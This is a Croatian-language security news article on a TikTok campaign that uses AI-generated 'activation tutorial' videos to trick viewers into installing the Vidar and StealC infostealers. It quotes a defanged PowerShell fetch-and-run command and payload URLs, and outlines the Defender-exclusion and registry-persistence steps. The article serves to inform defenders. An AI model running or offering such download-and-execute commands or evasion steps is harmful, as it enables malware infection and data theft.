Cyberkriminalci su otkrili novo područje za širenje zlonamjernog softvera iskorištavajući ogromnu bazu korisnika i doseg algoritama na TikToku.
Pojavila se sofisticirana kampanja društvenog inženjeringa koja koristi videozapise generirane umjetnom inteligencijom kako bi namamila korisnike na preuzimanje opasnog malvera za krađu informacija, prerušenog u tutorijale za aktivaciju softvera.
Ovi obmanjujući videozapisi obećavaju pomoć korisnicima pri aktivaciji legitimnih aplikacija kao što su Windows OS, Microsoft Office, CapCut i Spotify, ali umjesto toga isporučuju poznate alatke za krađu podataka, Vidar i StealC, neopreznim žrtvama.
Ova kampanja predstavlja značajnu evoluciju u taktici širenja malvera, odmičući se od tradicionalnih metoda dostave putem weba i iskorištavajući povjerenje i angažman koji su inherentni platformama društvenih medija.
Za razliku od uobičajenih napada koji se oslanjaju na zlonamjerne web stranice ili phishing putem e-pošte, ova operacija ugrađuje sve elemente društvenog inženjeringa direktno u video sadržaj, što sigurnosnim rješenjima znatno otežava otkrivanje.
Napadajući iskorištavaju viralnu prirodu TikToka, pri čemu je jedan zlonamjerni videozapis prikupio gotovo 500.000 pregleda, preko 20.000 lajkova i više od 100 komentara, pokazujući tako alarmantan doseg i učinkovitost kampanje.
Analitičari kompanije Trend Micro identificirali su više TikTok naloga uključenih u ovu operaciju, uključujući @gitallowed, @zane.houghton, @allaivo2, @sysglow.wow, @alexfixpc i @digitaldreams771, od kojih su svi od tada deaktivirani.
Istraživači su primijetili da su ovi nalozi objavljivali primjetno slične videozapise bez prikazanih lica, sa generisanim glasovima putem umjetne inteligencije, što ukazuje na automatizovan proces proizvodnje dizajniran za skalabilnost.
Tehnička sofisticiranost napada postaje očigledna u njegovoj metodologiji izvršenja.
Žrtvama se nalaže da otvore PowerShell i izvrše naizgled bezopasnu naredbu: iex (irm hxxps://allaivo[.]me/spotify). Ovaj PowerShell skript pokreće višestupanjski proces infekcije koji demonstrira napredne tehnike izbjegavanja otkrivanja.
Mehanizam infekcije i taktike perzistencije
Lanac infekcije malvera otkriva pažljivo organizirane korake dizajnirane da osiguraju uspješnu kompromitaciju uz izbjegavanje otkrivanja.
Nakon izvršavanja, početni PowerShell skript kreira skrivene direktorijume unutar korisnikovih APPDATA i LOCALAPPDATA foldera, odmah dodajući te lokacije na listu izuzeća Windows Defendera kako bi se spriječilo skeniranje od strane antivirusnog softvera.
Zatim skript preuzima primarni teret sa adrese hxxps://amssh[.]co/file.exe, koji sadrži varijante malvera Vidar ili StealC.
Mehanizam perzistencije uključuje preuzimanje dodatnog PowerShell skripta sa adrese hxxps://amssh[.]co/script[.]ps1 i uspostavljanje ključa registra koji osigurava da se malver izvršava pri pokretanju sistema.
Važno je napomenuti da Vidar koristi inovativnu strategiju komande i kontrole, zloupotrebljavajući legitimne usluge kao što su Steam profili i Telegram kanali kao Dead Drop Resolvere kako bi prikrio stvarne adrese C&C servera, čineći napore na otkrivanju i uklanjanju znatno složenijima.
